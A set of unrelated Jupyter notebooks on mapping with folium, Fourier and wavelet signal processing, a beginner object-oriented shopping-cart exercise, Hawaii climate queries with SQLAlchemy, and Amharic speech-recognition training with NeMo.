# ## Terminator
# +
m = folium.Map([45, 3], zoom_start=1)
plugins.Terminator().add_to(m)
m.save(os.path.join('results', 'Plugins_2.html'))
m
# -
# ## Leaflet.boatmarker
# +
m = folium.Map([30, 0], zoom_start=3)
plugins.BoatMarker(
location=(34, -43),
heading=45,
wind_heading=150,
wind_speed=45,
color='#8f8'
).add_to(m)
plugins.BoatMarker(
location=(46, -30),
heading=-20,
wind_heading=46,
wind_speed=25,
color='#88f'
).add_to(m)
m.save(os.path.join('results', 'Plugins_3.html'))
m
# -
# ## Leaflet.BeautifyIcon
# +
from folium.plugins.beautify_icon import BeautifyIcon
from folium import Marker
m = folium.Map([45.5, -122], zoom_start=3)
icon_plane = BeautifyIcon(
icon='plane',
border_color='#b3334f',
text_color='#b3334f',
icon_shape='triangle')
icon_number = BeautifyIcon(
border_color='#00ABDC',
text_color='#00ABDC',
number=10,
inner_icon_style='margin-top:0;')
Marker(
location=[46, -122],
popup='Portland, OR',
icon=icon_plane
).add_to(m)
Marker(
location=[50, -122],
popup='Portland, OR',
icon=icon_number
).add_to(m)
m.save(os.path.join('results', 'Plugins_4.html'))
m
# -
# ## Fullscreen
# +
m = folium.Map(location=[41.9, -97.3], zoom_start=4)
plugins.Fullscreen(
position='topright',
title='Expand me',
title_cancel='Exit me',
force_separate_button=True).add_to(m)
m.save(os.path.join('results', 'Plugins_5.html'))
m
# -
# ## Timestamped GeoJSON
# +
from folium import plugins
m = folium.Map(
location=[35.68159659061569, 139.76451516151428],
zoom_start=16
)
# Lon, Lat order.
lines = [
{
'coordinates': [
[139.76451516151428, 35.68159659061569],
[139.75964426994324, 35.682590062684206],
],
'dates': [
'2017-06-02T00:00:00',
'2017-06-02T00:10:00'
],
'color': 'red'
},
{
'coordinates': [
[139.75964426994324, 35.682590062684206],
[139.7575843334198, 35.679505030038506],
],
'dates': [
'2017-06-02T00:10:00',
'2017-06-02T00:20:00'
],
'color': 'blue'
},
{
'coordinates': [
[139.7575843334198, 35.679505030038506],
[139.76337790489197, 35.678040905014065],
],
'dates': [
'2017-06-02T00:20:00',
'2017-06-02T00:30:00'
],
'color': 'green',
'weight': 15,
},
{
'coordinates': [
[139.76337790489197, 35.678040905014065],
[139.76451516151428, 35.68159659061569],
],
'dates': [
'2017-06-02T00:30:00',
'2017-06-02T00:40:00'
],
'color': '#FFFFFF',
},
]
features = [
{
'type': 'Feature',
'geometry': {
'type': 'LineString',
'coordinates': line['coordinates'],
},
'properties': {
'times': line['dates'],
'style': {
'color': line['color'],
'weight': line['weight'] if 'weight' in line else 5
}
}
}
for line in lines
]
plugins.TimestampedGeoJson({
'type': 'FeatureCollection',
'features': features,
}, period='PT1M', add_last_point=True).add_to(m)
m.save(os.path.join('results', 'Plugins_6.html'))
m
# +
from folium import plugins
points = [
{"time":'2017-06-02',
"popup":"<h1>address1</h1>",
"coordinates":[-2.548828, 51.467697]},
{"time":'2017-07-02',
"popup":"<h2 style=\"color:blue;\">address2<h2>",
"coordinates":[-0.087891, 51.536086]},
{"time":'2017-08-02',
"popup":"<h2 style=\"color:orange;\">address3<h2>",
"coordinates":[-6.240234, 53.383328]},
{"time":'2017-09-02',
"popup":"<h2 style=\"color:green;\">address4<h2>",
"coordinates":[-1.40625, 60.261617]},
{"time":'2017-10-02',
"popup":"""<table style=\"width:100%\">
<tr>
<th>Firstname</th>
<th>Lastname</th>
<th>Age</th>
</tr>
<tr>
<td>Jill</td>
<td>Smith</td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</table>""",
"coordinates":[-1.516113, 53.800651]}
]
features = [{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": point['coordinates'],
},
"properties": {
"time": point['time'],
"popup": point['popup'],
"id":"house",
'icon':'marker',
'iconstyle':{
'iconUrl': 'http://downloadicons.net/sites/default/files/small-house-with-a-chimney-icon-70053.png',
'iconSize': [20, 20]
}
}
} for point in points]
features.append({
'type': 'Feature',
'geometry': {
'type': 'LineString',
'coordinates': [[-2.548828, 51.467697], [-0.087891, 51.536086],
[-6.240234, 53.383328], [-1.40625, 60.261617],
[-1.516113, 53.800651]
],
},
'properties': {
'popup':'Current address',
'times': ['2017-06-02', '2017-07-02',
'2017-08-02', '2017-09-02',
'2017-10-02'],
'icon':'circle',
'iconstyle':{
'fillColor': 'green',
'fillOpacity': 0.6,
'stroke': 'false',
'radius': 13
},
'style': {'weight':0
},
'id':'man'
}
})
m = folium.Map(
location=[56.096555, -3.64746],
tiles = 'cartodbpositron',
zoom_start=5
)
plugins.TimestampedGeoJson(
{
'type': 'FeatureCollection',
'features': features
},
period='P1M',
add_last_point=True,
auto_play=False,
loop=False,
max_speed=1,
loop_button=True,
date_options='YYYY/MM/DD',
time_slider_drag_update=True,
duration='P2M'
).add_to(m)
m.save(os.path.join('results', 'Plugins_7.html'))
m
# -
# ## FeatureGroupSubGroup
#
# ### Sub categories
#
# Use the layer control to disable all markers in the category at once, or just those in one of the subgroups.
# +
m = folium.Map(
location=[0, 0],
zoom_start=6
)
fg = folium.FeatureGroup()
m.add_child(fg)
g1 = plugins.FeatureGroupSubGroup(fg, 'g1')
m.add_child(g1)
g2 = plugins.FeatureGroupSubGroup(fg, 'g2')
m.add_child(g2)
folium.Marker([-1,-1]).add_to(g1)
folium.Marker([1,1]).add_to(g1)
folium.Marker([-1,1]).add_to(g2)
folium.Marker([1,-1]).add_to(g2)
l = folium.LayerControl().add_to(m)
m
# -
# ### Marker clusters across groups
#
# Create two subgroups, but cluster markers together.
# +
m = folium.Map(
location=[0, 0],
zoom_start=6
)
mcg = folium.plugins.MarkerCluster(control=False)
m.add_child(mcg)
g1 = folium.plugins.FeatureGroupSubGroup(mcg, 'g1')
m.add_child(g1)
g2 = folium.plugins.FeatureGroupSubGroup(mcg, 'g2')
m.add_child(g2)
folium.Marker([-1,-1]).add_to(g1)
folium.Marker([1,1]).add_to(g1)
folium.Marker([-1,1]).add_to(g2)
folium.Marker([1,-1]).add_to(g2)
l = folium.LayerControl().add_to(m)
m
| examples/Plugins.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import matplotlib.pyplot as plt
import numpy as np
import math
import IPython
# %matplotlib notebook
# -
# # helpers
def plot(x, y):
plt.figure()
plt.plot(x, y)
# # Generate a signal composed of several frequencies
# +
# list of frequencies that are combined
samples = 640
samples_per_second = 640
frequencies = map(lambda f: f * 2*math.pi/samples_per_second, [1, 5])
# generate signal
time = np.arange(0, samples, 1)
signal = np.zeros(len(time))
for f in frequencies:
signal = np.add(signal, np.sin(f*time))
signal = np.add(signal, np.cos(f*time))
plot(time, signal)
# -
# # Add noise
noise_frequency = 20
signal = np.add(signal, np.cos(noise_frequency * time))
signal = np.add(signal, np.sin(noise_frequency * time))
plot(time, signal)
# # Fourier Transform
# +
# compute W[k]
W_k = np.zeros([samples, samples])
W_k_j = np.zeros([samples, samples])
for k in range(samples):
for n in range(samples):
W_k[k][n] = np.cos(2*math.pi/samples * n * k)
W_k_j[k][n] = np.sin(2*math.pi/samples * n * k)
# multiply the signal by this matrix
dft_real = np.dot(W_k, signal)
dft_img = np.dot(W_k_j, signal)
plot(time, dft_real)
plot(time, dft_img)
# -
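# As a quick sanity check (not part of the original notebook), the cosine/sine projection above can be compared against NumPy's FFT on a small, self-contained signal; the size `N` and test signal `x` below are illustrative choices, not the notebook's values.

```python
import numpy as np

# Rebuild the naive DFT bases for a small N so the check runs quickly
N = 64
n = np.arange(N)
x = np.sin(2 * np.pi * 3 * n / N) + 0.5 * np.cos(2 * np.pi * 7 * n / N)

W_real = np.cos(2 * np.pi * np.outer(n, n) / N)  # cosine (real) basis
W_imag = np.sin(2 * np.pi * np.outer(n, n) / N)  # sine (imaginary) basis

dft_real = W_real @ x
dft_imag = W_imag @ x

# np.fft.fft projects onto exp(-2j*pi*n*k/N) = cos(...) - 1j*sin(...),
# so the sine projection equals the negated imaginary part.
ref = np.fft.fft(x)
assert np.allclose(dft_real, ref.real, atol=1e-8)
assert np.allclose(dft_imag, -ref.imag, atol=1e-8)
```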
# # Remove high frequency noise
# +
dft_real[50:600] = 0
plot(time, dft_real)
dft_img[50:600] = 0
plot(time, dft_img)
# -
# # Synthesize signal back
# +
X_new = np.dot(dft_real, W_k) / samples
X_new_img = np.dot(dft_img, W_k_j) / samples
plot(time, np.add(X_new, X_new_img))
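# A further check (illustrative, not from the notebook): the synthesis step above is exact when no coefficients are zeroed out, because cos(a)cos(b) + sin(a)sin(b) = cos(a-b), and summing cos(2*pi*k(m-n)/N) over k gives N exactly when m = n and 0 otherwise.

```python
import numpy as np

# Round-trip identity for the real/imaginary DFT matrices used above
N = 32
n = np.arange(N)
rng = np.random.default_rng(0)
x = rng.standard_normal(N)

W_real = np.cos(2 * np.pi * np.outer(n, n) / N)
W_imag = np.sin(2 * np.pi * np.outer(n, n) / N)

# analysis then synthesis, with the same 1/N normalization as the notebook
x_rec = (W_real @ (W_real @ x) + W_imag @ (W_imag @ x)) / N
assert np.allclose(x_rec, x)
```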
# +
import matplotlib.pyplot as plt
import numpy as np
import wave
import sys
spf = wave.open('sample.wav','r')
#Extract Raw Audio from Wav File
signal = spf.readframes(-1)
signal = np.frombuffer(signal, dtype=np.int16)
#If stereo, bail out: this example handles mono files only
if spf.getnchannels() == 2:
    print('Just mono files')
    sys.exit(0)
plt.figure(1)
plt.title('Signal Wave...')
plt.plot(signal)
plt.show()
# -
IPython.display.Audio(signal, rate=44100)
np.fft.fft(signal)
| Fourier Analysis.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_python3
# language: python
# name: conda_python3
# ---
# <a href="https://colab.research.google.com/github/institutohumai/cursos-python/blob/master/Introduccion/4_Intro_Poo/ejercicio/ejercicio-solucion.ipynb"> <img src='https://colab.research.google.com/assets/colab-badge.svg' /> </a>
# <div align="center"> Recordá abrir en una nueva pestaña </div>
# ## Object-oriented programming
#
# In this exercise we are going to program a shopping cart.
#
# To do this we will write two classes: Carrito and Item.
#
# The item will have as properties a name, a price, and the URL of the image that represents it. By default, the URL is initialized to an empty string.
#
# The Carrito has a single property, the variable _lineas, which is a list of dictionaries.
#
# Carts are initialized empty; lines are then added with the agregar_item() method. Each line is a dictionary with two keys: "item", holding an object of type Item, and "cantidad", the quantity we want to add to the cart.
#
# Finally, carts have a get_total() method that returns the sum of the item prices, each multiplied by the quantity in its line.
# +
# The Item class
class Item():
def __init__(self, nombre, precio, url_imagen=''):
"""
Todas las propiedades del ítem son obligatorias menos url_imagen
En el ítem todas las propiedades son "públicas". Esto va a ser útil para acceder al precio desde el carrito.
"""
self.nombre = nombre
self.precio = precio
self.url_imagen = url_imagen
# +
# Create the items: a banana at $49.5 and a yoghurt at $32.5
banana = Item("banana",49.5)
yoghurt = Item("yoghurt",32.5)
# +
# Create the Carrito class
class Carrito():
def __init__(self):
"""
El Carrito siempre se inicializa con una lista de Ítems.
En el carrito la única propiedad es privada.
"""
self._lineas = []
def get_total(self):
total = 0
for linea in self._lineas:
total = total + (linea['cantidad'] * linea['item'].precio)
return total
def agregar_item(self,linea):
self._lineas.append(linea)
# -
# Now we are going to instantiate the cart and add one "line" with two bananas and another with three yoghurts.
# Instantiate the cart
carrito = Carrito()
# Add bananas
carrito.agregar_item({'item':banana,'cantidad':2})
# Add yoghurts
carrito.agregar_item({'item':yoghurt,'cantidad':3})
# Get the total
carrito.get_total()
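# A quick standalone check of the arithmetic (not part of the original notebook): two bananas at $49.5 plus three yoghurts at $32.5 should total 2 * 49.5 + 3 * 32.5 = 196.5, which is what get_total() returns above.

```python
# Condensed, self-contained restatement of the cart total computed above
lineas = [{'precio': 49.5, 'cantidad': 2},   # bananas
          {'precio': 32.5, 'cantidad': 3}]   # yoghurts
total = sum(l['cantidad'] * l['precio'] for l in lineas)
assert total == 196.5
print(total)
```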
| Introduccion/4_Intro_Poo/ejercicio/ejercicio-solucion.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernel_info:
# name: python3
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
from matplotlib import style
style.use('fivethirtyeight')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import datetime as dt
# # Reflect Tables into SQLAlchemy ORM
# Python SQL toolkit and Object Relational Mapper
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, inspect, func
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect = True)
# We can view all of the classes that automap found
Base.classes.keys()
# Save references to each table
Measurement = Base.classes.measurement
Station = Base.classes.station
# Create our session (link) from Python to the DB
session = Session(engine)
# +
#inspect Measurement table
measurement_inspector = inspect(engine)
measurement_inspector.get_table_names()
#inspect first row
measure_first_row = session.query(Measurement).first()
measure_first_row.__dict__
#columns
measure_columns = measurement_inspector.get_columns('measurement')
for c in measure_columns:
print (c['name'], c['type'])
# +
#inspect Station table
station_inspector = inspect(engine)
station_inspector.get_table_names()
#inspect first row
station_first_row = session.query(Station).first()
station_first_row.__dict__
#columns
station_columns = station_inspector.get_columns('station')
for c in station_columns:
print (c['name'], c['type'])
# -
# # Exploratory Climate Analysis
#Choose a start date and end date for your trip. Make sure that your vacation range is approximately 3-15 days total.
my_vacation = dt.date(2016, 6, 10) - dt.timedelta(days=12)
my_vacation
# +
# Design a query to retrieve the last 12 months of precipitation data and plot the results
#find the last date in the dataset - found 8/23/2017
session.query(func.max(Measurement.date)).all()
# Calculate the date 1 year ago from the last data point in the database
query_date = dt.date(2017, 8, 23) - dt.timedelta(days=365)
# Perform a query to retrieve the data and precipitation scores
Measurements_12m = session.query(Measurement.date, Measurement.prcp).\
filter(Measurement.date > query_date).\
order_by(Measurement.date).all()
# Save the query results as a Pandas DataFrame and set the index to the date column
measurement_df = pd.DataFrame(Measurements_12m, columns=['date', 'prcp'])
measurement_df.rename(columns={"date": "Date", "prcp": "Precipitation"}, inplace=True)
measurement_df.set_index('Date', inplace=True)
# Sort the dataframe by date
measurement_df.sort_index(inplace=True)
# Use Pandas Plotting with Matplotlib to plot the data
measurement_df.plot(rot=90)
plt.ylabel("Inches")
plt.title("Precipitation by Date")
plt.show()
# -
# Use Pandas to calculate the summary statistics for the precipitation data
measurement_df.describe()
# Design a query to show how many stations are available in this dataset?
station_count = session.query(Station).count()
station_count
# What are the most active stations? (i.e. what stations have the most rows)
# List the stations and the counts in descending order.
station_func = func.count(Measurement.station)
session.query(Measurement.station, station_func).group_by(Measurement.station).order_by(station_func.desc()).all()
# +
# Using the station id from the previous query, calculate the lowest temperature recorded,
# highest temperature recorded, and average temperature of the most active station
#most active station ID = USC00519281
temp_query = [Measurement.station,
func.min(Measurement.tobs),
func.max(Measurement.tobs),
func.avg(Measurement.tobs)]
session.query(*temp_query).filter(Measurement.station == "USC00519281").all()
# +
# Choose the station with the highest number of temperature observations.
# Query the last 12 months of temperature observation data for this station and plot the results as a histogram
Station_12m = session.query(Measurement.date, Measurement.tobs).\
filter(Measurement.date > query_date).\
filter(Measurement.station == "USC00519281").all()
# Save the query results as a Pandas DataFrame
station_df = pd.DataFrame(Station_12m, columns=['date', 'tobs'])
station_df.rename(columns={"date": "Date", "tobs": "Temperature"}, inplace=True)
station_df.set_index('Date', inplace=True)
# Sort the dataframe by date
station_df.sort_index(inplace=True)
# Use Pandas Plotting with Matplotlib to plot the data
station_df.plot.hist(rot=90)
plt.xlabel("Temperature")
plt.title("Temperature by Frequency")
plt.show()
# -
# ## Bonus Challenge Assignment
# +
# This function called `calc_temps` will accept start date and end date in the format '%Y-%m-%d'
# and return the minimum, average, and maximum temperatures for that range of dates
def calc_temps(start_date, end_date):
"""TMIN, TAVG, and TMAX for a list of dates.
Args:
start_date (string): A date string in the format %Y-%m-%d
end_date (string): A date string in the format %Y-%m-%d
Returns:
        TMIN, TAVG, and TMAX
"""
return session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start_date).filter(Measurement.date <= end_date).all()
# function usage example
print(calc_temps('2012-02-28', '2012-03-05'))
# -
# Use your previous function `calc_temps` to calculate the tmin, tavg, and tmax
# for your trip using the previous year's data for those same dates.
print(calc_temps('2016-05-29','2016-06-10'))
# +
# Plot the results from your previous query as a bar chart.
# Use "Trip Avg Temp" as your Title
# Use the average temperature for the y value
# Use the peak-to-peak (tmax-tmin) value as the y error bar (yerr)
calcs = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= '2016-05-29').filter(Measurement.date <= '2016-06-10').all()
# Save the query results as a Pandas DataFrame and set the index to the date column
calc_df = pd.DataFrame(calcs, columns=['tmin', 'tavg', 'tmax'])
#measurement_df.rename(columns={"date":"Date", "prcp":"Precipitation"}, inplace= True)
# Use Pandas Plotting with Matplotlib to plot the data
calc_df.plot.bar(rot=90)
plt.show()
# +
# Calculate the total amount of rainfall per weather station for your trip dates using the previous year's matching dates.
# Sort this in descending order by precipitation amount and list the station, name, latitude, longitude, and elevation
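# The stub above could be filled in along these lines. This sketch is not the original author's solution: the real notebook reflects Measurement and Station from Resources/hawaii.sqlite, so minimal stand-in models and a few made-up rows are declared here to let the join/aggregate pattern run anywhere.

```python
from sqlalchemy import create_engine, func, Column, Integer, String, Float
from sqlalchemy.orm import Session, declarative_base

Base = declarative_base()

class Station(Base):                      # stand-in for the reflected table
    __tablename__ = 'station'
    id = Column(Integer, primary_key=True)
    station = Column(String)
    name = Column(String)
    latitude = Column(Float)
    longitude = Column(Float)
    elevation = Column(Float)

class Measurement(Base):                  # stand-in for the reflected table
    __tablename__ = 'measurement'
    id = Column(Integer, primary_key=True)
    station = Column(String)
    date = Column(String)
    prcp = Column(Float)

engine = create_engine('sqlite://')       # in-memory database with fake rows
Base.metadata.create_all(engine)
session = Session(engine)
session.add_all([
    Station(station='S1', name='A', latitude=21.3, longitude=-157.8, elevation=3.0),
    Station(station='S2', name='B', latitude=21.4, longitude=-157.9, elevation=7.0),
    Measurement(station='S1', date='2016-06-01', prcp=0.5),
    Measurement(station='S1', date='2016-06-02', prcp=0.3),
    Measurement(station='S2', date='2016-06-01', prcp=0.1),
])
session.commit()

# Total rainfall per station over the trip dates, descending by amount
results = session.query(Station.station, Station.name, Station.latitude,
                        Station.longitude, Station.elevation,
                        func.sum(Measurement.prcp)).\
    filter(Measurement.station == Station.station).\
    filter(Measurement.date >= '2016-05-29').\
    filter(Measurement.date <= '2016-06-10').\
    group_by(Station.station).\
    order_by(func.sum(Measurement.prcp).desc()).all()
print(results)
```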
# +
# Create a query that will calculate the daily normals
# (i.e. the averages for tmin, tmax, and tavg for all historic data matching a specific month and day)
def daily_normals(date):
"""Daily Normals.
Args:
date (str): A date string in the format '%m-%d'
Returns:
A list of tuples containing the daily normals, tmin, tavg, and tmax
"""
sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]
return session.query(*sel).filter(func.strftime("%m-%d", Measurement.date) == date).all()
daily_normals("01-01")
# +
# calculate the daily normals for your trip
# push each tuple of calculations into a list called `normals`
# Set the start and end date of the trip
# Use the start and end date to create a range of dates
# Strip off the year and save a list of %m-%d strings
# Loop through the list of %m-%d strings and calculate the normals for each date
# -
# Load the previous query results into a Pandas DataFrame and add the `trip_dates` range as the `date` index
# Plot the daily normals as an area plot with `stacked=False`
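# One way to fill in the stubs above (a sketch, not the author's solution): build the trip date range, strip the year to get '%m-%d' strings, look up the normals for each date, and area-plot with stacked=False. A fake_daily_normals stand-in is used here so the block runs without the sqlite database; swap in the real daily_normals() from the cell above.

```python
import datetime as dt
import pandas as pd

def fake_daily_normals(month_day):
    # Stand-in for the real daily_normals() query defined earlier
    return [(60.0, 70.0, 80.0)]          # (tmin, tavg, tmax) placeholder

# Set the start and end date of the trip, then build the range of dates
trip_start = dt.date(2016, 5, 29)
trip_end = dt.date(2016, 6, 10)
trip_dates = [trip_start + dt.timedelta(days=d)
              for d in range((trip_end - trip_start).days + 1)]

# Strip off the year, keeping a list of '%m-%d' strings
month_days = [d.strftime('%m-%d') for d in trip_dates]

# Push each tuple of calculations into a list called `normals`
normals = [fake_daily_normals(md)[0] for md in month_days]

# Load into a DataFrame with the trip dates as the index
normals_df = pd.DataFrame(normals, columns=['tmin', 'tavg', 'tmax'],
                          index=pd.Index(trip_dates, name='date'))
# normals_df.plot.area(stacked=False)   # area plot, as the stub suggests
print(month_days[0], month_days[-1], normals_df.shape)
```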
| climate_starter.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: nemo
# language: python
# name: nemo
# ---
# ## Train step 1: Bootstrap from pretrained model
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
# %load_ext autoreload
# %autoreload 2
from Cfg import Cfg
C = Cfg('NIST', 16000, 'amharic', 'build')
from load_pretrained_amharic_model import load_pretrained_amharic_model
model = load_pretrained_amharic_model(C, 0)
# +
import pytorch_lightning as pl
import os, datetime
model_save_dir='save/nemo_amharic'
class ModelCheckpointAtEpochEnd(pl.callbacks.ModelCheckpoint):
def on_epoch_end(self, trainer, pl_module):
metrics = trainer.callback_metrics
metrics['epoch'] = trainer.current_epoch
trainer.checkpoint_callback.on_validation_end(trainer, pl_module)
pid=os.getpid()
dt=datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
checkpoint_callback = ModelCheckpointAtEpochEnd(
filepath=model_save_dir+'/amharic_'+f'{dt}_{pid}'+'_{epoch:02d}',
verbose=True,
save_top_k=-1,
save_weights_only=False,
period=1)
trainer = pl.Trainer(gpus=[0], max_epochs=200, amp_level='O1', precision=16, checkpoint_callback=checkpoint_callback)
# -
from ruamel.yaml import YAML
from omegaconf import DictConfig
config_path = 'amharic_16000.yaml'
yaml = YAML(typ='safe')
with open(config_path) as f:
params = yaml.load(f)
train_manifest=f'{C.build_dir}/train_manifest.json'
test_manifest=f'{C.build_dir}/test_manifest.json'
params['model']['train_ds']['manifest_filepath'] = train_manifest
params['model']['validation_ds']['manifest_filepath'] = test_manifest
model.set_trainer(trainer)
model.setup_training_data(train_data_config=params['model']['train_ds'])
model.setup_validation_data(val_data_config=params['model']['validation_ds'])
model.setup_optimization(optim_config=DictConfig(params['model']['optim']))
from reshuffle_samples import reshuffle_samples
reshuffle_samples(C)
trainer.fit(model)
# ## DEV translation
from Cfg import Cfg
from glob import glob
from package_DEV import package_DEV
from load_pretrained_amharic_model import load_pretrained_amharic_model
version='113'
C = Cfg('NIST', 16000, 'amharic', 'dev', version)
model = load_pretrained_amharic_model(C, 0)
files=list(sorted(glob(f'{C.audio_split_dir}/*.wav')))
translations=model.transcribe(paths2audio_files=files, batch_size=32)
# + active=""
# from package_DEV import package_DEV
# package_DEV(C1, files, translations)
# -
len(files), len(translations)
# +
# coding: utf-8
import sys, os, tarfile
from glob import glob
from pathlib import Path
from datetime import datetime
import numpy as np
import pandas as pd
# -
np.seterr(all='raise')
ctms={'_'.join(os.path.basename(fn.split(',')[0]).split('_')[0:7]): [] for fn in files}
for fn,pred in zip(files,translations):
pred=pred.strip()
if len(pred)==0:
continue
key=os.path.basename(fn)[0:-4].split('_')
ctm='_'.join(key[0:7])
F='_'.join(key[0:6])
channel=key[6]
tstart=float(key[-2])
tend=float(key[-1])
tbeg=tstart/C.sample_rate
tdur=(tend-tstart)/C.sample_rate
chnl='1' if channel=='inLine' else '2'
tokens=pred.split(' ')
n_tokens=len(tokens)
token_lengths=np.array([len(token) for token in tokens])
sum_token_lengths=token_lengths.sum()
token_weights=token_lengths/sum_token_lengths
dt=tdur*token_weights
ends = tdur*np.cumsum(token_weights)
tgrid=(ends-ends[0])+tbeg
token_tstart=list(zip(tokens,tgrid))
if ctms[ctm]: start_from = ctms[ctm][-1][2]
for token, tstart, dt in zip(tokens,tgrid,dt):
if token and token[0] not in ['(', '<']:
row=(F,chnl,tstart,dt,token)
ctms[ctm].append(row)
df=pd.DataFrame(ctms[ctm], columns=['file', 'channel', 'start', 'duration', 'prediction'])
os.chdir('/home/catskills/Desktop/openasr20')
for ctm in ctms:
ctms[ctm].sort()
shipping_dir=f'ship/{C.language}/{C.release}'
Path(shipping_dir).mkdir(parents=True, exist_ok=True)
timestamp=datetime.today().strftime('%Y%m%d_%H%M')
for ctm in ctms:
fn=f'{shipping_dir}/{ctm}.ctm'
with open(fn,'wt', encoding='utf-8') as f:
for row in ctms[ctm]:
line='\t'.join([str(x) for x in row])
f.write(f"{line}\n")
os.chdir(shipping_dir)
tar_fn=f'../../catskills_openASR20_dev_{C.language}_{C.release}.tgz'
with tarfile.open(tar_fn, "w:gz") as tar:
for fn in glob('*.ctm'):
tar.add(fn)
os.chdir('../../..')
print('wrote', tar_fn)
# ## Bad split CTM
ctm
(1112054-1069053)/16000
1112054/16000
| notebooks/CRC_NeMo_007.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import sys,os
ea979path = os.path.abspath('../../')
if ea979path not in sys.path:
sys.path.append(ea979path)
import ea979.src as ia
# # DWT
#
# - [Coefficients from Wikipedia](http://en.wikipedia.org/wiki/Cohen-Daubechies-Feauveau_wavelet)
#
# +
import numpy as np
def wave1d (f,freq=0,inv=0,coeff=0):
r,c = f.shape
g = np.zeros((r,c+8))
g[:, 4:c+4] = f
g[:,-4:] = f[:,-2:-6:-1]
g[:, :4] = f[:,4:0:-1]
if coeff==0: #CDF 5/3
if inv==0: #Transformada
if freq==0: #LOW
s = np.array([0, 0, -1.0/8.0, 2.0/8.0, 6.0/8.0])
else: #HIGH
s = np.array([0, 0, 0, -1.0/2.0, 1.0])
else: #Inversa
if freq==0: #LOW
s = np.array([0, 0, 0, 1.0/2.0, 1.0])
else: #HIGH
s = np.array([0, 0, -1.0/8.0, -2.0/8.0, 6.0/8.0])
else: #CDF 9/7
if inv==0: #Transformada
if freq==0: #LOW
s = np.array([0.02674875741080976,-0.01686411844287495,-0.07822326652898785,0.2668641184428723,0.6029490182363579])
else: #HIGH
s = np.array([0.0 , 0.09127176311424948,-0.05754352622849957,-0.5912717631142470,1.115087052456994])
else: #Inversa
if freq==0: #LOW
s = np.array([0.0 ,-0.09127176311424948,-0.05754352622849957,0.5912717631142470,1.115087052456994])
else: #HIGH
s = np.array([0.02674875741080976, 0.01686411844287495,-0.07822326652898785,-0.2668641184428723,0.6029490182363579])
h = np.empty((r,c))
h = s[0] * g[:,0:-8] + \
s[1] * g[:,1:-7] + \
s[2] * g[:,2:-6] + \
s[3] * g[:,3:-5] + \
s[4] * g[:,4:-4] + \
s[3] * g[:,5:-3] + \
s[2] * g[:,6:-2] + \
s[1] * g[:,7:-1] + \
s[0] * g[:,8:]
return h[:,:c]
# -
def wave2d (f,coeff=0, it=0):
r,c = f.shape
h = np.empty(f.shape)
h[:,:c//2] = wave1d(f,0,0,coeff)[:,1::2]
h[:,c//2:] = wave1d(f,1,0,coeff)[:,::2]
g = np.empty(f.shape)
g[:r//2,:] = np.transpose(wave1d(np.transpose(h),0,0,coeff)[:,1::2])
g[r//2:,:] = np.transpose(wave1d(np.transpose(h),1,0,coeff)[:,::2])
if it==0:
return g
else:
g[:c//2,:r//2] = wave2d(g[:c//2,:r//2],coeff, it-1)
return g
def itwave1d (f,coeff=0):
r,c = f.shape
rec = np.empty((c,r))
recl = np.zeros((c,r))
recl[:,1::2] = np.transpose(f)[:,:r//2]
recl = wave1d(recl,0,1,coeff)
rech = np.zeros((c,r))
rech[:,::2] = np.transpose(f)[:,r//2:]
rech = wave1d(rech,1,1,coeff)
rec = recl + rech
return rec
def iwave2d (f,coeff=0,it=0):
r,c = f.shape
if it>0:
f[:c//2,:r//2] = iwave2d(f[:c//2,:r//2],coeff,it-1)
rect = np.empty((c,r))
    rect = itwave1d(f,coeff) # filter along the vertical
rec = np.empty((r,c))
    rec = itwave1d(rect,coeff) # filter along the horizontal
return rec
# ## Wavelet CDF5/3
# +
f = mpimg.imread('../data/cameraman.tif')
#f = f[:-1,:-1]
print(f.shape)
ia.adshow(f,'Input Image')
# +
print(f.shape)
g = wave2d(f,0,5)
ia.adshow(ia.normalize(g),'CDF 5/3 wavelet transform')
rec = iwave2d(g,0,5)
ia.adshow(ia.normalize(rec),'Reconstructed image, CDF 5/3')
print('Maximum difference, CDF 5/3:', np.abs(f-rec).max())
# -
# ## Wavelet CDF9/7
# +
print(f.shape)
g = wave2d(f,1,2)
ia.adshow(ia.normalize(g),'CDF 9/7 wavelet transform')
rec = iwave2d(g,1,2)
ia.adshow(ia.normalize(rec),'Reconstructed image, CDF 9/7')
print('Maximum difference, CDF 9/7:', np.abs(f-rec).max())
# -
# ## Spectrum of the CDF filters
# +
#tcdf_53_lf = np.array([0 , 0 , -1.0/8.0, 2.0/8.0, 6.0/8.0, 2.0/8.0, -1.0/8.0, 0 , 0 ])
#tcdf_53_hf = np.array([0 , 0 , 0, -1.0/2.0, 1.0 , -1.0/2.0, 0, 0 , 0 ])
